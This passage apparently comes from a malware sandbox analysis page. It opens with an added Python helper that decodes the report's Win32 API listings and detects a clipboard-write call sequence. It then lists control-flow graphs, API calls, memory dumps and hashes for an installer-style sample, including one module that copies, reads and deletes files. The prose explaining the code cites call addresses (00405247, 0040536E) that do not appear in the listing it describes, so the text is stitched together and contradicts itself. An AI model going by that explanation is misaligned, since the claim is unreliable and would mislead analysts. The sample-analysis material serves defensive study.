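Added example for this page, not Joe Sandbox or sample code; the sample
lines come from the 4051ca listing and the tables cover only values seen here."""
import re
from typing import List, NamedTuple, Union


class Call(NamedTuple):
    api: str
    module: str
    args: tuple      # int for 8-digit hex operands, str for '?' or string operands
    ref: int         # call-site address from the 'ref:' field
    subcall: bool    # True for 'Part of subcall function ...' lines


# '<api>.<module>(<args>), ref: <addr>'; the argument list is optional.
LINE_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})")

# Message numbers as the report shows them (commctrl.h / winuser.h values).
LVM_FIRST, WM_USER, CCM_FIRST = 0x1000, 0x0400, 0x2000
MESSAGE_NAMES = {
    LVM_FIRST + 1: "LVM_SETBKCOLOR",
    LVM_FIRST + 4: "LVM_GETITEMCOUNT",
    LVM_FIRST + 27: "LVM_INSERTCOLUMNA",
    LVM_FIRST + 36: "LVM_SETTEXTCOLOR",
    LVM_FIRST + 38: "LVM_SETTEXTBKCOLOR",
    LVM_FIRST + 45: "LVM_GETITEMTEXTA",
    LVM_FIRST + 54: "LVM_SETEXTENDEDLISTVIEWSTYLE",
    WM_USER + 1: "PBM_SETRANGE",
    WM_USER + 9: "PBM_SETBARCOLOR",
    CCM_FIRST + 1: "PBM_SETBKCOLOR",     # same value as CCM_SETBKCOLOR
}


def flag_names(value: int, table: dict) -> str:
    """Render a bit-flag operand as 'A|B', keeping undecoded bits as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


# (api, zero-based argument index) -> decoder for that operand.
ARG_DECODERS = {
    ("SendMessageA", 1): lambda v: MESSAGE_NAMES.get(v, f"msg_{v:#x}"),
    ("SetClipboardData", 0): lambda v: {1: "CF_TEXT"}.get(v, hex(v)),
    ("GlobalAlloc", 0): lambda v: flag_names(v, {0x2: "GMEM_MOVEABLE", 0x40: "GMEM_ZEROINIT"}),
    ("TrackPopupMenu", 1): lambda v: flag_names(v, {0x80: "TPM_NONOTIFY", 0x100: "TPM_RETURNCMD"}),
}


def parse_arg(tok: str) -> Union[int, str]:
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def parse_api_lines(lines: List[str]) -> List[Call]:
    calls = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:                       # headers such as 'APIs' are skipped
            continue
        api, module, argtext, ref = m.groups()
        args = tuple(parse_arg(t) for t in argtext.split(",")) if argtext else ()
        calls.append(Call(api, module, args, int(ref, 16), "Part of subcall function" in line))
    return calls


def render(call: Call) -> str:
    parts = []
    for i, a in enumerate(call.args):
        dec = ARG_DECODERS.get((call.api, i))
        if isinstance(a, int):
            parts.append(dec(a) if dec else f"{a:#x}")
        else:
            parts.append(a)             # '?' = operand not recovered by the sandbox
    return f"{call.api}({', '.join(parts)}) @ {call.ref:08X}"


CLIPBOARD_WRITE = ("OpenClipboard", "EmptyClipboard", "SetClipboardData", "CloseClipboard")


def finds_clipboard_write(calls: List[Call]) -> bool:
    """True if the function's own calls (subcalls excluded), ordered by call-site
    address, contain the open/empty/set/close clipboard sequence as a subsequence."""
    seq = iter(c.api for c in sorted(calls, key=lambda c: c.ref) if not c.subcall)
    return all(any(api == want for api in seq) for want in CLIPBOARD_WRITE)


# Copied from the 'APIs' listing for the function at 4051ca on this page.
REPORT_LINES = [
    "• GetDlgItem.USER32(?,00000403), ref: 00405229",
    "• SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D",
    "  • Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069",
    "• CreatePopupMenu.USER32 ref: 00405454",
    "• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2",
    "• OpenClipboard.USER32(00000000), ref: 004054EE",
    "• EmptyClipboard.USER32 ref: 004054F4",
    "• GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD",
    "• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B",
    "• SetClipboardData.USER32(00000001,00000000), ref: 0040553F",
    "• CloseClipboard.USER32 ref: 00405545",
]
CALLS = parse_api_lines(REPORT_LINES)


def decoded_listing() -> List[str]:
    return [render(c) for c in sorted(CALLS, key=lambda c: c.ref)]
```

Sorting by the `ref` address matters because the report's listing order is not strictly by address (the GetDlgItem at 00405247 above is printed after the calls at 0040536E), and the "Part of subcall function" lines belong to a callee, so they are excluded from the sequence check. Extending `MESSAGE_NAMES` and `ARG_DECODERS` with further constants is all that is needed to decode the other functions on this page.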

Control-flow Graph
control_flow_graph 446 403b52-403b64 447 403ca5-403cb4 446->447 448 403b6a-403b70 446->448 450 403d03-403d18 447->450 451 403cb6-403cfe GetDlgItem * 2 call 404026 SetClassLongA call 40140b 447->451 448->447 449 403b76-403b7f 448->449 452 403b81-403b8e SetWindowPos 449->452 453 403b94-403b97 449->453 455 403d58-403d5d call 404072 450->455 456 403d1a-403d1d 450->456 451->450 452->453 458 403bb1-403bb7 453->458 459 403b99-403bab ShowWindow 453->459 463 403d62-403d7d 455->463 461 403d50-403d52 456->461 462 403d1f-403d2a call 401389 456->462 464 403bd3-403bd6 458->464 465 403bb9-403bce DestroyWindow 458->465 459->458 461->455 468 403ff3 461->468 462->461 483 403d2c-403d4b SendMessageA 462->483 469 403d86-403d8c 463->469 470 403d7f-403d81 call 40140b 463->470 474 403bd8-403be4 SetWindowLongA 464->474 475 403be9-403bef 464->475 471 403fd0-403fd6 465->471 473 403ff5-403ffc 468->473 479 403fb1-403fca DestroyWindow EndDialog 469->479 480 403d92-403d9d 469->480 470->469 471->468 478 403fd8-403fde 471->478 474->473 481 403c92-403ca0 call 40408d 475->481 482 403bf5-403c06 GetDlgItem 475->482 478->468 485 403fe0-403fe9 ShowWindow 478->485 479->471 480->479 486 403da3-403df0 call 405f87 call 404026 * 3 GetDlgItem 480->486 481->473 487 403c25-403c28 482->487 488 403c08-403c1f SendMessageA IsWindowEnabled 482->488 483->473 485->468 516 403df2-403df7 486->516 517 403dfa-403e36 ShowWindow EnableWindow call 404048 EnableWindow 486->517 491 403c2a-403c2b 487->491 492 403c2d-403c30 487->492 488->468 488->487 494 403c5b-403c60 call 403fff 491->494 495 403c32-403c38 492->495 496 403c3e-403c43 492->496 494->481 497 403c79-403c8c SendMessageA 495->497 498 403c3a-403c3c 495->498 496->497 499 403c45-403c4b 496->499 497->481 498->494 502 403c62-403c6b call 40140b 499->502 503 403c4d-403c53 call 40140b 499->503 502->481 513 403c6d-403c77 502->513 512 403c59 503->512 512->494 513->512 516->517 520 403e38-403e39 517->520 521 403e3b 517->521 522 403e3d-403e6b GetSystemMenu EnableMenuItem SendMessageA 520->522 521->522 523 403e80 522->523 524 403e6d-403e7e SendMessageA 522->524 525 403e86-403ec0 call 40405b call 403b33 call 405f65 lstrlenA call 405f87 SetWindowTextA call 401389 523->525 524->525 525->463 536 403ec6-403ec8 525->536 536->463 537 403ece-403ed2 536->537 538 403ef1-403f05 DestroyWindow 537->538 539 403ed4-403eda 537->539 538->471 541 403f0b-403f38 CreateDialogParamA 538->541 539->468 540 403ee0-403ee6 539->540 540->463 542 403eec 540->542 541->471 543 403f3e-403f95 call 404026 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 541->543 542->468 543->468 548 403f97-403faf ShowWindow call 404072 543->548 548->471
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8E
• ShowWindow.USER32(?), ref: 00403BAB
• DestroyWindow.USER32 ref: 00403BBF
• SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BDB
• GetDlgItem.USER32(?,?), ref: 00403BFC
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C10
• IsWindowEnabled.USER32(00000000), ref: 00403C17
• GetDlgItem.USER32(?,00000001), ref: 00403CC5
• GetDlgItem.USER32(?,?), ref: 00403CCF
• SetClassLongA.USER32(?,000000F2,?), ref: 00403CE9
• SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D3A
• GetDlgItem.USER32(?,?), ref: 00403DE0
• ShowWindow.USER32(00000000,?), ref: 00403E01
• EnableWindow.USER32(?,?), ref: 00403E13
• EnableWindow.USER32(?,?), ref: 00403E2E
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E44
• EnableMenuItem.USER32(00000000), ref: 00403E4B
• SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E63
• SendMessageA.USER32(?,00000401,?,00000000), ref: 00403E76
• lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EA0
• SetWindowTextA.USER32(?,0042A870), ref: 00403EAF
• ShowWindow.USER32(?,0000000A), ref: 00403FE3
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID:
• API String ID: 184305955-0
• Opcode ID: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
• Instruction ID: 825bbfaa6b66e15a56cde4951677423d70b10f791e0768be12abaf391e468a8e
• Opcode Fuzzy Hash: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
• Instruction Fuzzy Hash: 80C19F71604205AFDB206F22EE45E2B3EBCFB4570AF40053EFA42B11E1CB7999429B1D

Control-flow Graph
control_flow_graph 551 4037b5-4037cd call 4062fd 554 4037e1-403812 call 405e4c 551->554 555 4037cf-4037df call 405ec3 551->555 560 403814-403825 call 405e4c 554->560 561 40382a-403830 lstrcatA 554->561 564 403835-40385e call 403a7a call 4059eb 555->564 560->561 561->564 569 403864-403869 564->569 570 4038e5-4038ed call 4059eb 564->570 569->570 571 40386b-40388f call 405e4c 569->571 576 4038fb-403920 LoadImageA 570->576 577 4038ef-4038f6 call 405f87 570->577 571->570 578 403891-403893 571->578 580 4039a1-4039a9 call 40140b 576->580 581 403922-403952 RegisterClassA 576->581 577->576 582 4038a4-4038b0 lstrlenA 578->582 583 403895-4038a2 call 405928 578->583 592 4039b3-4039be call 403a7a 580->592 593 4039ab-4039ae 580->593 584 403a70 581->584 585 403958-40399c SystemParametersInfoA CreateWindowExA 581->585 589 4038b2-4038c0 lstrcmpiA 582->589 590 4038d8-4038e0 call 4058fd call 405f65 582->590 583->582 588 403a72-403a79 584->588 585->580 589->590 596 4038c2-4038cc GetFileAttributesA 589->596 590->570 604 4039c4-4039de ShowWindow call 40628f 592->604 605 403a47-403a4f call 40515e 592->605 593->588 599 4038d2-4038d3 call 405944 596->599 600 4038ce-4038d0 596->600 599->590 600->590 600->599 612 4039e0-4039e5 call 40628f 604->612 613 4039ea-4039fc GetClassInfoA 604->613 610 403a51-403a57 605->610 611 403a69-403a6b call 40140b 605->611 610->593 614 403a5d-403a64 call 40140b 610->614 611->584 612->613 617 403a14-403a45 DialogBoxParamA call 40140b call 403705 613->617 618 4039fe-403a0e GetClassInfoA RegisterClassA 613->618 614->593 617->588 618->617
APIs
  • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
  • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
• lstrcatA.KERNEL32(00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,?,761F3410,00436400,00435000,00000000), ref: 00403830
• lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,?,761F3410), ref: 004038A5
• lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
• GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
• LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 0040390C
  • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
• RegisterClassA.USER32(0042EBA0), ref: 00403949
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403961
• CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403996
• ShowWindow.USER32(00000005,00000000), ref: 004039CC
• GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 004039F8
• GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A05
• RegisterClassA.USER32(0042EBA0), ref: 00403A0E
• DialogBoxParamA.USER32(?,00000000,00403B52,00000000), ref: 00403A2D
Strings
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
• API String ID: 1975747703-2904746566
• Opcode ID: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
• Instruction ID: cf57693f3f88dc886a5042f17341946b18930627488d4c28d640959b633c26bb
• Opcode Fuzzy Hash: 7c46e95d15e6a007461aada79675e14bbdf31a6050e9bfd56e3caf825b44128a
• Instruction Fuzzy Hash: 3E61D770240600AED620BB669D45F373EACEB44749F40447EF985B22E2DB7C9D029A2D

Control-flow Graph

[Control-flow graph of the function at 0x0040416F (basic blocks 0x40416F through 0x4043EC); the rendered graph and its executed/not-executed colouring are not recoverable from the report.]
APIs
• CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041FA
• GetDlgItem.USER32(00000000,000003E8), ref: 0040420E
• SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040422C
• GetSysColor.USER32(?), ref: 0040423D
• SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040424C
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040425B
• lstrlenA.KERNEL32(?), ref: 0040425E
• SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040426D
• SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404282
• GetDlgItem.USER32(?,0000040A), ref: 004042E4
• SendMessageA.USER32(00000000), ref: 004042E7
• GetDlgItem.USER32(?,000003E8), ref: 00404312
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404352
• LoadCursorA.USER32(00000000,00007F02), ref: 00404361
• SetCursor.USER32(00000000), ref: 0040436A
• LoadCursorA.USER32(00000000,00007F00), ref: 00404380
• SetCursor.USER32(00000000), ref: 00404383
• SendMessageA.USER32(00000111,00000001,00000000), ref: 004043AF
• SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C3
Strings
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: :A@$N
• API String ID: 3103080414-504195219
• Opcode ID: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
• Instruction ID: 4cc5751811e84191dd39768f0d3a0055f5535ab869bb222e46a2b56927204bf5
• Opcode Fuzzy Hash: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
• Instruction Fuzzy Hash: DA6183B1A00205BFEB10AF61DD45F6A7B69EB84715F00413AFB05BA1D1C7B8A951CF98

Control-flow Graph

APIs
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,0042EC00,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
• Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
• Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
• Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4

Control-flow Graph

[Control-flow graph of the function at 0x00405BD4 (basic blocks 0x405BD4 through 0x405D43); the rendered graph and its executed/not-executed colouring are not recoverable from the report.]
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
• GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C0E
  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
• GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C2B
• wsprintfA.USER32 ref: 00405C49
• GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,?,0042CA00,?,?,?,?,?), ref: 00405C84
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
• SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
• GlobalFree.KERNEL32(00000000), ref: 00405D32
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39
  • Part of subcall function 00405AFE: GetFileAttributesA.KERNEL32(?,00402D88,00436C00,80000000,?), ref: 00405B02
  • Part of subcall function 00405AFE: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
Strings
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %s=%s$[Rename]
• API String ID: 2171350718-1727408572
                                                                                                                                                                                    • Opcode ID: ff8ff72b881d1764c6ded4d329ff48958eda2edc6d0759682d82c86a4fea5b43
                                                                                                                                                                                    • Instruction ID: 17f8f1309641d4637e2ed4fc5cbc189083b9795c86085c8cd532ee5919f79a85
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff8ff72b881d1764c6ded4d329ff48958eda2edc6d0759682d82c86a4fea5b43
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61310131601B19ABD2206B65AD8DF6B3A5CDF45714F14053BBA01F62D2EA7CA8018EBD

Control-flow Graph (graph for function 404496 not reproduced here)
APIs
• GetDlgItem.USER32(?,000003FB), ref: 004044E5
• SetWindowTextA.USER32(00000000,?), ref: 0040450F
• SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045C0
• CoTaskMemFree.OLE32(00000000), ref: 004045CB
• lstrcmpiA.KERNEL32(0042E3A0,0042A870), ref: 004045FD
• lstrcatA.KERNEL32(?,0042E3A0), ref: 00404609
• SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040461B
  • Part of subcall function 00405665: GetDlgItemTextA.USER32(?,?,00000400,00404652), ref: 00405678
• GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 004046D9
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F4
  • Part of subcall function 0040484D: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
  • Part of subcall function 0040484D: wsprintfA.USER32 ref: 004048F3
  • Part of subcall function 0040484D: SetDlgItemTextA.USER32(?,0042A870), ref: 00404906
Strings
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ItemText$Free$BrowseDiskFolderSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: A
• API String ID: 1128208598-3554254475
• Opcode ID: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
• Instruction ID: e7c3eafb31c7d15e6a6da749512948d226074c80576101813d8e7fa34d4e7a23
• Opcode Fuzzy Hash: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
• Instruction Fuzzy Hash: 44A190B1900209ABDB11AFA6CD45AAFB7B8EF85314F14843BF605B72D1D77C89418B2D
APIs
• GetSystemDirectoryA.KERNEL32(0042E3A0,00000400), ref: 004060B2
• GetWindowsDirectoryA.KERNEL32(0042E3A0,00000400,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 004060C5
• SHGetSpecialFolderLocation.SHELL32(004050C4,761F23A0,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 00406101
• SHGetPathFromIDListA.SHELL32(761F23A0,0042E3A0), ref: 0040610F
• CoTaskMemFree.OLE32(761F23A0), ref: 0040611B
• lstrcatA.KERNEL32(0042E3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040613F
• lstrlenA.KERNEL32(0042E3A0,?,0042A050,00000000,004050C4,0042A050,00000000,00000000,?,761F23A0), ref: 00406191
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 00406081
• \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406139
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
• String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 717251189-730719616
• Opcode ID: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
• Instruction ID: 1b13e8ff18f2312f61c88a614d7ce51b6c0fc9f7833a06fa9902b6248b39176d
• Opcode Fuzzy Hash: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
• Instruction Fuzzy Hash: D561F170A00105AEDF20AF24CC90BBB3BA5EB55314F56413FE903BA2D2C67D4962CB5E
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,?,00000080,00000000,?,?,00000000), ref: 367B1D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D8A
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: ccf22585f54c7a7306a839019c49ca3f068ceeb9fc3059d9d66b394a6047fa29
• Instruction ID: 93a4485fdb45601b465fad2d48bfd012849a06e847ffdba4b1033fbb2548c650
• Opcode Fuzzy Hash: ccf22585f54c7a7306a839019c49ca3f068ceeb9fc3059d9d66b394a6047fa29
• Instruction Fuzzy Hash: C42130B595121CBFEB10DBA49C8CEEB7AACEB08354F9009A5F611E7140E7709E468B70
APIs
Strings
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: CountTick$wsprintf
• String ID: (TA$(TA$... %d%%
• API String ID: 551687249-2950751476
• Opcode ID: ea954d237801f269f6a6cc6d2de777c833a7b6855df03dce106e68f46f520f78
• Instruction ID: f4b3021151c61e236b0315b1fcc5adb3b60be84788d5942dbd3e7f3cce39453d
• Opcode Fuzzy Hash: ea954d237801f269f6a6cc6d2de777c833a7b6855df03dce106e68f46f520f78
• Instruction Fuzzy Hash: 86517D71900219EBDB10DF65DA4469E7BB8EF48356F14853BE800BB2D0C7789E41CBAD
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 004040AA
• GetSysColor.USER32(00000000), ref: 004040C6
• SetTextColor.GDI32(?,00000000), ref: 004040D2
• SetBkMode.GDI32(?,?), ref: 004040DE
• GetSysColor.USER32(?), ref: 004040F1
• SetBkColor.GDI32(?,?), ref: 00404101
• DeleteObject.GDI32(?), ref: 0040411B
• CreateBrushIndirect.GDI32(?), ref: 00404125
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
